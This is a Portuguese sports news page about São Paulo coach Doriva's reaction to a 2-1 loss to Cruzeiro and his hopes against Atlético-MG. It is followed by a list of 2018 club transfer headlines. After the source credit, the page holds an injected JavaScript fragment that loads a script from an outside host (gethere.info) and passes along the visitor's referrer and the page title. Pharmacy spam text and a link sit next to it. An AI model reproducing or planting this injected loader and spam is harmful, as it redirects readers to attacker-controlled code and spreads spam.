Destaque Noticia

Doriva ignora título do Corinthians e já projeta vitória sobre o Atlético-MG

Doriva não parece preocupado em evitar o título de campeão brasileiro do Corinthians. O técnico do São Paulo declarou após a derrota por 2 a 1 para o Cruzeiro, nesse domingo, no Mineirão, que a equipe dará o máximo dentro de campo para se manter na briga pelo G4 com uma vitória sobre o vice-líder Atlético-MG na próxima rodada. “Temos que fazer uma grande partida para derrotar o Atlético-MG no próximo jogo e continuar a busca pelo nosso propósito”, disse o comandante.

O treinador já havia dito durante a última semana que gostaria de enfrentar o Timão, no dia 22, com o título confirmado para o rival. Caso conquiste os três pontos contra o Galo, no próximo dia 19, o Tricolor eliminará qualquer chance matemática que o Corinthians tem de perder o troféu do Nacional.

Segundo Doriva, o momento decisivo do Brasileirão impede o São Paulo de desperdiçar mais pontos. “Estamos conversando e orientando. Sabemos que estamos bem vivos na competição. O fato de termos chances de conquistar o nosso objetivo já motiva os atletas. Temos um compromisso muito grande, mas hoje perdemos o jogo. A reação será imediata”, declarou.

A reapresentação do São Paulo está marcada para a quarta-feira. Ao que tudo indica, Doriva deverá comandar atividades táticas que priorizem a criação de jogadas ofensivas. O treinador não aprovou a disposição do time no primeiro tempo e deseja corrigir as falhas já na partida contra o Atlético-MG.

“Hoje fizemos um gol com o Luis Fabiano, mas criamos pouco. O Cruzeiro conseguiu impor um ritmo muito forte e eu fui obrigado a fazer um ajuste para conseguir encaixar a marcação. Nós equilibramos o jogo e até criamos algumas chances que poderiam ter sido convertidas em gol”, afirmou. “Não era o resultado que queríamos. Temos uma sequência difícil, mas estamos dentro e precisamos vencer para voltar a figurar no G4”, concluiu.

Gazeta Esportiva.nets.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; cheap pills purchase a cheap pills no rx – http://crna.radiostudent.si/?p=2967

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

Chega de mesmice! São Paulo sinaliza postura diferente no mercado para 2019

saopauloadmin9 de dezembro de 2018

“Caicedo está perto do São Paulo” diz jornalista da Gol TV do Equador

saopauloadmin9 de dezembro de 2018

São Paulo sonda Ezequiel Barco, argentino que atua nos EUA, ex Independiente

saopauloadmin8 de dezembro de 2018

R$ 16 MILHÕES: Carrasco do Palmeiras dá preferência ao São Paulo por histórico antigo de interesse

saopauloadmin7 de dezembro de 2018

Carlinhos Neves está de volta ao São Paulo

saopauloadmin6 de dezembro de 2018

Diego Ribas + William Arão = Rodrigo Caio + dinheiro: Sai negócio entre São Paulo e Flamengo?

saopauloadmin5 de dezembro de 2018

“Martin Silva está na mira do São Paulo” diz setorista do Vasco; veja

saopauloadmin5 de dezembro de 2018

“O nível de treinamento vai sofrer um choque” diz Jardine

saopauloadmin4 de dezembro de 2018

SPFC abre negociação por Willian Arão, do Flamengo

saopauloadmin4 de dezembro de 2018